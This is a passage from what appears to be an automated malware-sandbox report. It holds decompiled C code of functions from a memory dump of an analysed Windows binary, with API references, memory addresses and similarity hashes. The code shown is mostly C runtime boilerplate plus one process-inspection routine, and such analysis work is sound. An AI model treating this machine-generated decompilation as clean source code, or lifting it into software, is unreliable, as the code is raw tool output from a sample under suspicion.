				_push(_t30);
				E004343E2(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0043399B(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00433139(_t25, _t30);
					return _t25;
				}
				return _t25;
			}













                                                                                                0x00433b91
                                                                                                0x00433b91
                                                                                                0x00433b94
                                                                                                0x00433b99
                                                                                                0x00433b9c
                                                                                                0x00433b9e
                                                                                                0x00433ba1
                                                                                                0x00433ba4
                                                                                                0x00433ba5
                                                                                                0x00433ba8
                                                                                                0x00433bad
                                                                                                0x00433bad
                                                                                                0x00433bb0
                                                                                                0x00433bb4
                                                                                                0x00433bb7
                                                                                                0x00433bbc
                                                                                                0x00433bb9
                                                                                                0x00433bb9
                                                                                                0x00433bb9
                                                                                                0x00433bbf
                                                                                                0x00433bc5
                                                                                                0x00433bc8
                                                                                                0x00433bca
                                                                                                0x00433bcd
                                                                                                0x00433bd0
                                                                                                0x00433bd1
                                                                                                0x00433bda
                                                                                                0x00433bdf
                                                                                                0x00433be2
                                                                                                0x00433be8
                                                                                                0x00433beb
                                                                                                0x00433bee
                                                                                                0x00433bf1
                                                                                                0x00433bf2
                                                                                                0x00433bf5
                                                                                                0x00433c00
                                                                                                0x00433c04
                                                                                                0x00000000
                                                                                                0x00433c04
                                                                                                0x00433c0b

                                                                                                APIs
                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 00433BA8
                                                                                                  • Part of subcall function 004341E0: ___AdjustPointer.LIBCMT ref: 0043422A
                                                                                                • _UnwindNestedFrames.LIBCMT ref: 00433BBF
                                                                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00433BD1
                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00433BF5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                                • String ID:
                                                                                                • API String ID: 2633735394-0
                                                                                                • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                                                                                • Instruction ID: e021a9706d5ae18db0acb93d530c62d6d5f9f9de4b9bc2f5b96f038946e5f308
                                                                                                • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                                                                                • Instruction Fuzzy Hash: 88011732000108BBCF125F56CC01EDB7BAAFF4C759F15505AFD1866121D73AEAA1DBA8
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00418068, Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041807D
                                                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 0041809F
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004180AA
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004180B2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$FileModuleNameOpenProcess
                                                                                                • String ID:
                                                                                                • API String ID: 3706008839-0
                                                                                                • Opcode ID: cb4ed2b19b4b1f2a53795112b295101a8e6fdb5ee909fb117afed395b29affc1
                                                                                                • Instruction ID: 2c86ad556935017758f0f014cded1554511469535e69454f0589763b0010a6d7
                                                                                                • Opcode Fuzzy Hash: cb4ed2b19b4b1f2a53795112b295101a8e6fdb5ee909fb117afed395b29affc1
                                                                                                • Instruction Fuzzy Hash: 6AF0E93174031867D620A2655C09FB73ABC87C8B82F10017EFA08D6181EEA8D88546AE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00432B81, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00432B81() {
				void* _t4;
				void* _t8;

				E00435DC1();
				E00432B15();
				if(E00435EE8() != 0) {
					_t4 = E00435E9A(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00435F24();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                                                                0x00432b81
                                                                                                0x00432b86
                                                                                                0x00432b92
                                                                                                0x00432b97
                                                                                                0x00432b9c
                                                                                                0x00432b9e
                                                                                                0x00432ba9
                                                                                                0x00432ba0
                                                                                                0x00432ba0
                                                                                                0x00000000
                                                                                                0x00432ba0
                                                                                                0x00432b94
                                                                                                0x00432b94
                                                                                                0x00432b96
                                                                                                0x00432b96

                                                                                                APIs
                                                                                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00432B81
                                                                                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00432B86
                                                                                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00432B8B
                                                                                                  • Part of subcall function 00435EE8: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00435EF9
                                                                                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00432BA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                • String ID:
                                                                                                • API String ID: 1761009282-0
                                                                                                • Opcode ID: 50cb9e1cc312dad3490e76ffbb225425fbe7469f564cf0576c1ee516de2b9699
                                                                                                • Instruction ID: c0a5d602c469063785cd4c9acb075ffdc8e91f54dee3b5385a9ec7aeab68aa75
                                                                                                • Opcode Fuzzy Hash: 50cb9e1cc312dad3490e76ffbb225425fbe7469f564cf0576c1ee516de2b9699
                                                                                                • Instruction Fuzzy Hash: 2FC04C74014F90111C507FB223171AEB3901C6E38DF9034CFE8502B2039A9E250B617F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004412CD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • __startOneArgErrorHandling.LIBCMT ref: 0044135D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorHandling__start
                                                                                                • String ID: pow
                                                                                                • API String ID: 3213639722-2276729525
                                                                                                • Opcode ID: 24b87c615846ca568d1b0a20e7a7f57ea621b2eacb17dce27f094279b975220c
                                                                                                • Instruction ID: 935732daf83d2aaaf2e2e23a7076ba3493a7f372a1cdb7d37cdb48f3c6138d84
                                                                                                • Opcode Fuzzy Hash: 24b87c615846ca568d1b0a20e7a7f57ea621b2eacb17dce27f094279b975220c
                                                                                                • Instruction Fuzzy Hash: 04515A61E0860196FB217B54C90137B6BD4EB40B12F304D6BF896467F9EB3C8CD59A8E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00425FBD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 48%
                                                                                                			E00425FBD(char __ecx, intOrPtr __edx) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr* _v32;
				char _t58;
				void* _t63;
				intOrPtr* _t64;
				intOrPtr _t65;
				intOrPtr _t68;
				void* _t69;
				intOrPtr* _t70;
				void* _t74;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t83;
				char _t84;
				intOrPtr* _t86;
				intOrPtr* _t87;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t96;
				intOrPtr _t101;
				intOrPtr _t105;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				void* _t110;

				_t58 = __ecx;
				_v28 = __ecx;
				_t105 = __edx;
				_v20 = __edx;
				if(__ecx == 0 || __edx == 0) {
					L8:
					return 0;
				} else {
					_t108 =  *((intOrPtr*)(__ecx + 0x20));
					if(_t108 == 0) {
						L21:
						_t109 =  *((intOrPtr*)(_t58 + 0x1c));
						if(_t109 == 0) {
							L48:
							return 1;
						}
						_t84 = 0;
						_v16 = 0;
						_v24 = 0;
						_v28 = 0;
						_v8 = 0;
						_v12 = 0;
						do {
							_t63 = ( *(_t109 + 0xc) & 0x000000ff) - 1;
							if(_t63 == 0) {
								_t64 =  *((intOrPtr*)(_t105 + 0x28));
								_v32 = _t64;
								if(_t64 == 0) {
									L38:
									L39:
									_t65 = _v16;
									L40:
									_t89 = _v12;
									goto L41;
								}
								_v24 = 1;
								_t107 = _t64;
								do {
									_push( *((intOrPtr*)(_t109 + 8)));
									_push( *((intOrPtr*)(_t109 + 4)));
									_push( *((intOrPtr*)(_t107 + 8)));
									_t90 = 2;
									_t68 = E00425ED7(_t90,  *((intOrPtr*)(_t107 + 0xc)));
									_t107 =  *_t107;
									_t110 = _t110 + 0xc;
									_v28 = _t68;
								} while (_t107 != 0);
								_t105 = _v20;
								goto L38;
							}
							_t69 = _t63 - 1;
							if(_t69 == 0) {
								_t70 =  *((intOrPtr*)(_t105 + 0x24));
								_v32 = _t70;
								if(_t70 == 0) {
									goto L38;
								}
								_t106 = _t70;
								_t84 = 1;
								do {
									_push( *((intOrPtr*)(_t109 + 8)));
									_push( *((intOrPtr*)(_t109 + 4)));
									_push( *((intOrPtr*)(_t106 + 8)));
									_t91 = 2;
									_t65 = E00425ED7(_t91,  *((intOrPtr*)(_t106 + 0xc)));
									_t106 =  *_t106;
									_t110 = _t110 + 0xc;
									_v16 = _t65;
								} while (_t106 != 0);
								_t105 = _v20;
								_t43 =  &_v8; // 0x427269
								_t101 =  *_t43;
								goto L40;
							}
							if(_t69 != 0) {
								goto L38;
							}
							_t73 =  *((intOrPtr*)(_t105 + 0x334));
							_t101 = 1;
							_v8 = 1;
							if( *((intOrPtr*)(_t105 + 0x334)) == 0) {
								goto L39;
							}
							_t92 =  *((intOrPtr*)(_t109 + 8));
							if( *((intOrPtr*)(_t105 + 0x338)) <  *((intOrPtr*)(_t109 + 8))) {
								goto L39;
							}
							_t74 = E00434641(_t73,  *((intOrPtr*)(_t109 + 4)), _t92);
							_t32 =  &_v8; // 0x427269
							_t101 =  *_t32;
							_t110 = _t110 + 0xc;
							_t65 = _v16;
							if(_t74 != 0) {
								goto L40;
							}
							_t89 = 1;
							_v12 = 1;
							L41:
							_t109 =  *_t109;
						} while (_t109 != 0);
						if(_t84 == 0 || _t65 != 0) {
							if(_v24 == 0 || _v28 != 0) {
								if(_t101 == 0 || _t89 != 0) {
									goto L48;
								} else {
									goto L8;
								}
							} else {
								goto L8;
							}
						} else {
							goto L8;
						}
					} else {
						goto L3;
					}
					do {
						L3:
						_t76 = ( *(_t108 + 0xc) & 0x000000ff) - 1;
						if(_t76 == 0) {
							_t86 =  *((intOrPtr*)(_t105 + 0x28));
							while(_t86 != 0) {
								_t77 = E00425ED7(1,  *((intOrPtr*)(_t86 + 0xc)),  *((intOrPtr*)(_t86 + 8)),  *((intOrPtr*)(_t108 + 4)),  *((intOrPtr*)(_t108 + 8)));
								_t110 = _t110 + 0xc;
								if(_t77 != 0) {
									goto L8;
								}
								_t86 =  *_t86;
							}
							goto L19;
						}
						_t78 = _t76 - 1;
						if(_t78 == 0) {
							_t87 =  *((intOrPtr*)(_t105 + 0x24));
							while(_t87 != 0) {
								_push( *((intOrPtr*)(_t108 + 8)));
								_push( *((intOrPtr*)(_t108 + 4)));
								_push( *((intOrPtr*)(_t87 + 8)));
								_t96 = 2;
								_t79 = E00425ED7(_t96,  *((intOrPtr*)(_t87 + 0xc)));
								_t110 = _t110 + 0xc;
								if(_t79 != 0) {
									goto L8;
								}
								_t87 =  *_t87;
							}
							goto L19;
						}
						if(_t78 != 0) {
							goto L19;
						}
						_t82 =  *((intOrPtr*)(_t108 + 8));
						if( *((intOrPtr*)(_t105 + 0x338)) <  *((intOrPtr*)(_t108 + 8))) {
							goto L19;
						}
						_t83 = E00434641( *((intOrPtr*)(_t105 + 0x334)),  *((intOrPtr*)(_t108 + 4)), _t82);
						_t110 = _t110 + 0xc;
						if(_t83 != 0) {
							goto L19;
						}
						goto L8;
						L19:
						_t108 =  *_t108;
					} while (_t108 != 0);
					_t58 = _v28;
					goto L21;
				}
			}





































                                                                                                0x00425fc5
                                                                                                0x00425fc7
                                                                                                0x00425fcb
                                                                                                0x00425fcd
                                                                                                0x00425fd2
                                                                                                0x00426018
                                                                                                0x00000000
                                                                                                0x00425fd8
                                                                                                0x00425fd8
                                                                                                0x00425fdd
                                                                                                0x0042607c
                                                                                                0x0042607c
                                                                                                0x00426081
                                                                                                0x004261a0
                                                                                                0x00000000
                                                                                                0x004261a2
                                                                                                0x00426087
                                                                                                0x00426089
                                                                                                0x0042608c
                                                                                                0x0042608f
                                                                                                0x00426092
                                                                                                0x00426095
                                                                                                0x00426098
                                                                                                0x0042609c
                                                                                                0x0042609f
                                                                                                0x0042612d
                                                                                                0x00426130
                                                                                                0x00426135
                                                                                                0x00426163
                                                                                                0x00426166
                                                                                                0x00426166
                                                                                                0x00426169
                                                                                                0x00426169
                                                                                                0x00000000
                                                                                                0x00426169
                                                                                                0x00426137
                                                                                                0x0042613e
                                                                                                0x00426140
                                                                                                0x00426140
                                                                                                0x00426146
                                                                                                0x00426149
                                                                                                0x0042614e
                                                                                                0x0042614f
                                                                                                0x00426154
                                                                                                0x00426156
                                                                                                0x00426159
                                                                                                0x0042615c
                                                                                                0x00426160
                                                                                                0x00000000
                                                                                                0x00426160
                                                                                                0x004260a5
                                                                                                0x004260a8
                                                                                                0x004260f6
                                                                                                0x004260f9
                                                                                                0x004260fe
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00426102
                                                                                                0x00426104
                                                                                                0x00426105
                                                                                                0x00426105
                                                                                                0x0042610b
                                                                                                0x0042610e
                                                                                                0x00426113
                                                                                                0x00426114
                                                                                                0x00426119
                                                                                                0x0042611b
                                                                                                0x0042611e
                                                                                                0x00426121
                                                                                                0x00426125
                                                                                                0x00426128
                                                                                                0x00426128
                                                                                                0x00000000
                                                                                                0x00426128
                                                                                                0x004260ae
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004260b4
                                                                                                0x004260bc
                                                                                                0x004260bd
                                                                                                0x004260c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004260c8
                                                                                                0x004260d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004260dc
                                                                                                0x004260e1
                                                                                                0x004260e1
                                                                                                0x004260e4
                                                                                                0x004260e9
                                                                                                0x004260ec
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x004260f0
                                                                                                0x004260f1
                                                                                                0x0042616c
                                                                                                0x0042616c
                                                                                                0x0042616e
                                                                                                0x00426178
                                                                                                0x00426187
                                                                                                0x00426196
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00425fe3
                                                                                                0x00425fe3
                                                                                                0x00425fe7
                                                                                                0x00425fea
                                                                                                0x00426049
                                                                                                0x0042606b
                                                                                                0x0042605d
                                                                                                0x00426062
                                                                                                0x00426067
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00426069
                                                                                                0x00426069
                                                                                                0x00000000
                                                                                                0x0042606b
                                                                                                0x00425fec
                                                                                                0x00425fef
                                                                                                0x00426021
                                                                                                0x00426043
                                                                                                0x00426026
                                                                                                0x0042602c
                                                                                                0x0042602f
                                                                                                0x00426034
                                                                                                0x00426035
                                                                                                0x0042603a
                                                                                                0x0042603f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00426041
                                                                                                0x00426041
                                                                                                0x00000000
                                                                                                0x00426047
                                                                                                0x00425ff5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00425ff7
                                                                                                0x00426000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0042600c
                                                                                                0x00426011
                                                                                                0x00426016
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0042606f
                                                                                                0x0042606f
                                                                                                0x00426071
                                                                                                0x00426079
                                                                                                0x00000000
                                                                                                0x00426079

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memcmp
                                                                                                • String ID: irB
                                                                                                • API String ID: 2931989736-1033638517
                                                                                                • Opcode ID: 120f9d004c1eb18e1ea1d1686bb21c584d876b3dcf00480fdd14d99f290d082d
                                                                                                • Instruction ID: e79a622e3f6ac8b7c144f513c2f51a3317a1fa9f6373d75043333cc3042f2629
                                                                                                • Opcode Fuzzy Hash: 120f9d004c1eb18e1ea1d1686bb21c584d876b3dcf00480fdd14d99f290d082d
                                                                                                • Instruction Fuzzy Hash: 9851E535B006229BCB21CF69D981A3BB7B5FF44310B96402ED91897301D735FE10DB88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004472E3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E004472E3(signed int _a4, signed short* _a8, char _a12) {
				void _v8;
				signed int _v12;
				signed int _v16;
				signed short* _v20;
				void* _v24;
				long _v28;
				intOrPtr _t73;
				signed short* _t74;
				signed short* _t76;
				signed char _t77;
				signed short _t83;
				signed short _t85;
				void* _t87;
				signed short _t88;
				void* _t92;
				signed short* _t93;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t100;
				signed short _t101;
				signed short* _t104;
				void* _t105;
				char _t106;
				char _t107;
				void* _t108;
				signed short _t109;
				signed int _t110;
				signed int _t111;
				signed short* _t112;
				void* _t115;

				_t3 =  &_a12; // 0x447ae1
				_t111 =  *_t3;
				_t95 = _a4 >> 6;
				_t110 = (_a4 & 0x0000003f) * 0x30;
				_v12 = _t95;
				_t73 =  *((intOrPtr*)(0x46d800 + _t95 * 4));
				_t92 = 0xa;
				_v24 =  *((intOrPtr*)(_t73 + _t110 + 0x18));
				_t104 = _a8;
				if(_t111 == 0 ||  *_t104 != _t92) {
					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) & 0x000000fb;
				} else {
					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) | 0x00000004;
				}
				_t74 =  &(_t104[_t111]);
				_t93 = _t104;
				_v20 = _t74;
				_t112 = _t104;
				if(_t104 >= _t74) {
					L31:
					return _t112 - _t104 & 0xfffffffe;
				} else {
					_t76 =  &(_t104[1]);
					while(1) {
						_t96 =  *_t93 & 0x0000ffff;
						_v16 = _t96;
						_t97 = _v12;
						if(_t96 == 0x1a) {
							break;
						}
						_t105 = 0xd;
						_t104 = _a8;
						if(_v16 == _t105) {
							_t28 =  &_v20; // 0x447ae1
							if(_t76 >=  *_t28) {
								_t93 =  &(_t93[1]);
								_v16 =  &(_t76[1]);
								if(ReadFile(_v24,  &_v8, 2,  &_v28, 0) == 0 || _v28 == 0) {
									L23:
									_t83 = 0xd;
									 *_t112 = _t83;
									_t112 =  &(_t112[1]);
								} else {
									_t100 = _v12;
									_t85 = 0xa;
									if(( *( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x28) & 0x00000048) == 0) {
										if(_v8 != _t85) {
											L22:
											E00446077(_a4, 0xfffffffe, 0xffffffff, 1);
											_t115 = _t115 + 0x10;
											_t87 = 0xa;
											if(_v8 == _t87) {
												L24:
												_t76 = _v16;
												L25:
												_t104 = _a8;
												L26:
												_t62 =  &_v20; // 0x447ae1
												if(_t93 <  *_t62) {
													continue;
												}
												goto L31;
											}
											goto L23;
										}
										_t104 = _a8;
										if(_t112 != _t104) {
											goto L22;
										}
										 *_t112 = _t85;
										_t112 =  &(_t112[1]);
										_t76 = _v16;
										goto L26;
									}
									_t106 = _v8;
									if(_t106 != _t85) {
										_t88 = 0xd;
										 *_t112 = _t88;
										 *((char*)( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x2a)) = _t106;
										 *((char*)( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x2b)) = _t106;
										_t107 = 0xa;
										 *((char*)( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x2c)) = _t107;
									} else {
										 *_t112 = _t85;
									}
								}
								goto L24;
							}
							_t108 = 0xa;
							_t104 = _a8;
							if( *_t76 != _t108) {
								_t109 = 0xd;
								 *_t112 = _t109;
								_t93 =  &(_t93[1]);
								_t112 =  &(_t112[1]);
								_t76 =  &(_t76[1]);
								goto L25;
							}
							_t101 = 0xa;
							_t93 =  &(_t93[2]);
							 *_t112 = _t101;
							_t76 =  &(_t76[2]);
							_t112 =  &(_t112[1]);
							goto L26;
						}
						_t93 =  &(_t93[1]);
						 *_t112 = _v16;
						_t112 =  &(_t112[1]);
						_t76 =  &(_t76[1]);
						goto L26;
					}
					_t98 =  *((intOrPtr*)(0x46d800 + _t97 * 4));
					_t77 =  *(_t98 + _t110 + 0x28);
					if((_t77 & 0x00000040) != 0) {
						 *_t112 =  *_t93;
						_t112 =  &(_t112[1]);
					} else {
						 *(_t98 + _t110 + 0x28) = _t77 | 0x00000002;
					}
					goto L31;
				}
			}



































                                                                                                0x004472f6
                                                                                                0x004472f6
                                                                                                0x004472fa
                                                                                                0x004472fd
                                                                                                0x00447300
                                                                                                0x00447305
                                                                                                0x0044730c
                                                                                                0x00447311
                                                                                                0x00447314
                                                                                                0x00447319
                                                                                                0x00447327
                                                                                                0x00447320
                                                                                                0x00447320
                                                                                                0x00447320
                                                                                                0x0044732c
                                                                                                0x0044732f
                                                                                                0x00447331
                                                                                                0x00447334
                                                                                                0x00447338
                                                                                                0x00447495
                                                                                                0x004474a2
                                                                                                0x0044733e
                                                                                                0x0044733e
                                                                                                0x00447341
                                                                                                0x00447341
                                                                                                0x00447344
                                                                                                0x0044734a
                                                                                                0x0044734d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447355
                                                                                                0x0044735a
                                                                                                0x0044735d
                                                                                                0x00447373
                                                                                                0x00447376
                                                                                                0x004473ae
                                                                                                0x004473b3
                                                                                                0x004473cb
                                                                                                0x0044745b
                                                                                                0x0044745d
                                                                                                0x0044745e
                                                                                                0x00447461
                                                                                                0x004473db
                                                                                                0x004473db
                                                                                                0x004473ec
                                                                                                0x004473ed
                                                                                                0x0044742d
                                                                                                0x00447441
                                                                                                0x0044744a
                                                                                                0x0044744f
                                                                                                0x00447454
                                                                                                0x00447459
                                                                                                0x00447464
                                                                                                0x00447464
                                                                                                0x00447467
                                                                                                0x00447467
                                                                                                0x0044746a
                                                                                                0x0044746a
                                                                                                0x0044746d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447473
                                                                                                0x00000000
                                                                                                0x00447459
                                                                                                0x0044742f
                                                                                                0x00447434
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447436
                                                                                                0x00447439
                                                                                                0x0044743c
                                                                                                0x00000000
                                                                                                0x0044743c
                                                                                                0x004473ef
                                                                                                0x004473f6
                                                                                                0x004473ff
                                                                                                0x00447400
                                                                                                0x0044740c
                                                                                                0x00447417
                                                                                                0x00447422
                                                                                                0x00447423
                                                                                                0x004473f8
                                                                                                0x004473f8
                                                                                                0x004473f8
                                                                                                0x004473f6
                                                                                                0x00000000
                                                                                                0x004473cb
                                                                                                0x0044737a
                                                                                                0x0044737e
                                                                                                0x00447381
                                                                                                0x00447399
                                                                                                0x0044739a
                                                                                                0x0044739d
                                                                                                0x004473a0
                                                                                                0x004473a3
                                                                                                0x00000000
                                                                                                0x004473a3
                                                                                                0x00447385
                                                                                                0x00447386
                                                                                                0x00447389
                                                                                                0x0044738c
                                                                                                0x0044738f
                                                                                                0x00000000
                                                                                                0x0044738f
                                                                                                0x00447362
                                                                                                0x00447365
                                                                                                0x00447368
                                                                                                0x0044736b
                                                                                                0x00000000
                                                                                                0x0044736b
                                                                                                0x00447475
                                                                                                0x0044747c
                                                                                                0x00447482
                                                                                                0x0044748f
                                                                                                0x00447492
                                                                                                0x00447484
                                                                                                0x00447486
                                                                                                0x00447486
                                                                                                0x00000000
                                                                                                0x00447482

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: zD$zD
                                                                                                • API String ID: 0-2382888341
                                                                                                • Opcode ID: 84485be1d0154cb3f7a328aeb12e4d10e6027ae6d8aee5d0389b0561e14c76e4
                                                                                                • Instruction ID: a95be68ce260b593dd2f4fc4a9e91d76d59830fe305d2a59e391408ed8c2b3e0
                                                                                                • Opcode Fuzzy Hash: 84485be1d0154cb3f7a328aeb12e4d10e6027ae6d8aee5d0389b0561e14c76e4
                                                                                                • Instruction Fuzzy Hash: 7351EA31E08205EBDB20DF54D882BBABB70FF15310F25815BD9585B3D1E3789982DB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0044B007, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E0044B007(void* __ecx, signed int _a4, intOrPtr _a8) {
				int _v8;
				void* __esi;
				int _t15;
				int _t16;
				signed int _t17;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t36;

				_push(__ecx);
				_t23 = _a4;
				_push(_t34);
				if(_t23 == 0) {
					L21:
					_t15 = E00443640(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
					__eflags = _t15;
					if(_t15 != 0) {
						_t16 = _v8;
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = GetACP();
						}
						L25:
						return _t16;
					}
					L22:
					_t16 = 0;
					goto L25;
				}
				_t17 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t34 = 0x45b018;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t34) {
						break;
					}
